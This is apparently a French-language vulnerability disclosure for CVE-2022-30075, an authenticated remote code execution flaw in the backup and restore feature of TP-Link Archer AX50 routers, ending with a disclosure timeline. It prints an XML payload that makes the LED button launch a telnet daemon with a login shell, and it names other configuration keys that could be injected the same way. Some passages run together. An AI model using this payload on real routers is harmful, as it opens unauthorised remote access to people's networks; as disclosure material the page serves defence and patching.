
Tp-Link Archer AX50 RCE authentifiée (CVE-2022-30075)
Exécution de code à distance authentifiée sur les routeurs Tp-Link
Si votre routeur Tp-Link dispose d'une fonctionnalité de sauvegarde et de restauration et que son firmware est antérieur à juin 2022, il est probablement vulnérable.
Tp-Link Archer AX50 ; d'autres routeurs Tp-Link peuvent utiliser un format de sauvegarde différent et l'exploit devra être modifié.
Utilisation de l'exploit pour démarrer le démon telnet sur le routeur

<button name="led_switch">
<action>pressed</action>
<button>ledswitch</button>
<handler>/lib/led_switch</handler>
</button>
<button name="exploit">
<action>pressed</action>
<button>ledswitch</button>
<handler>/usr/sbin/telnetd -l /bin/login.sh</handler>
</button>
system.button.handler, mais elle peut être facilement contournée en changeant le nom du nœud XML parent (par exemple name="exploit")system.button.handler, mais aussi en utilisant ddns.service.ip_script, firewall.include.path, uhttpd.main, et d'autres.../usr/sbin/telnetd -l /bin/login.shtelnet 192.168.1.115.03.2022 - Vulnérabilité identifiée
15.03.2022 - Support Tp-Link contacté
16.03.2022 - Réponse reçue de Tp-Link
02.05.2022 - CVE attribué
27.05.2022 - Tp-Link a publié un firmware corrigeant la vulnérabilité
07.06.2022 - Détails techniques publiés